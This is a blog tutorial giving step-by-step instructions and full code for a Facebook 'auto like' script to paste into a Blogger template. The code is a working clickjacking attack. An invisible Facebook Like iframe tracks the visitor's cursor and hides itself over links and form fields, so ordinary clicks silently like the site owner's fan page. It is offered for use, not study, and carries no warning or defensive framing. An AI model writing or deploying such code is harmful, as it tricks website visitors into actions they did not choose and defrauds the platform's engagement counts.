
Facebook Fan Page Auto like Script for Bloggers/Blogspot:
To add this Script in Blogger, follow the steps below,
Step 1) Log in to your Blogger Dashboard.
Step 2) Go to Template.
Step 3) Click "EDIT HTML"
Step 4) Inside "HTML EDITOR", press "CTRL+F" and search </head> tag.
Step 5) Copy the following code below and just paste above </head> tag.
Step 6) Now again press "CTRL+F" and find </body> tag.<!-- / Facebook Page Autoliker Script for Bloggers by Blacklisthackers. -->
<script src="http://ajax.googleapis.com/ajax/libs/jquery/1.5.2/jquery.min.js" type="text/javascript">
</script>
<script type='text/javascript'> function ClickJackFbHide(){ jQuery("div[id^=\'clickjack-button-wrapper\']").hide(); } function ClickJackFbShow(){ jQuery("div[id^=\'clickjack-button-wrapper\']").show(); }
</script>
<!-- / Facebook Page Autoliker Script for Bloggers by Blacklisthackers. -->
Step 7) Copy the following code and just paste above </body> tag.
Step 8) Replace "Decentkamboz" with your own Facebook Fanpage Username.<!-- / Facebook Page Autoliker Script for Bloggers by Blacklisthackers. -->
<div id='clickjack-button-wrapper-5' style='position: absolute; opacity: 0; filter: alpha(opacity = 0); -ms-filter:'progid:DXImageTransform.Microsoft.Alpha(Opacity=0)'; margin-left: -50px; z-index: 100; width:27px; height:20px; overflow:hidden'> <!--<div class="clickjack-mask" style="position: absolute; top: 5px; left: 5px; z-index: 1000; height: 13px; width: 15px;"></div>-->
<iframe allowTransparency='true' frameborder='0' scrolling='no' src='http://www.facebook.com/plugins/like.php?href=http%3A%2F%2Fwww.facebook.com%2Fdecentkamboz&layout=button_count&show_faces=false&width=50&action=like&colorscheme=light&height=21' style='border:none; overflow:hidden; width:45px; left:-19px; height:21px; z-index: 0; position: relative;'/>
</div> <script type='text/javascript'> jQuery( document ).ready( function() { $( "#clickjack-button-wrapper-5" ).parent().mousemove( function( e ) { jQuery( "#clickjack-button-wrapper-5" ).css( { top: e.pageY - 10, left: e.pageX + 30 } ); } ); clickjack_hider(); var clickjack_fb_timer = setTimeout("clickjack_hider()",5000); } ); function clickjack_hider(){ jQuery("input").mouseout(function(){ClickJackFbShow();}); jQuery("a").mouseout(function(){ClickJackFbShow();}); jQuery("button").mouseout(function(){ClickJackFbShow();}); jQuery("textarea").mouseout(function(){ClickJackFbShow();}); jQuery(".ratingblock").mouseout(function(){ClickJackFbShow();}); jQuery("object").mouseout(function(){ClickJackFbShow();}); jQuery("input").mouseover(function(){ClickJackFbHide();}); jQuery("a").mouseover(function(){ClickJackFbHide();}); jQuery("button").mouseover(function(){ClickJackFbHide();}); jQuery("textarea").mouseover(function(){ClickJackFbHide();}); jQuery(".ratingblock").mouseover(function(){ClickJackFbHide();}); jQuery("object").mouseover(function(){ClickJackFbHide();}); }
</script>
<!-- / Facebook Page Autoliker Script for Bloggers by Blacklisthackers. -->
Step 9) Click "Save Template" and Its done.
I hope you enjoyed this tutorial, so don't forget to share it with your friends and keep visiting our Blog. More you share, more will be share for you :)
0 comments:
Post a Comment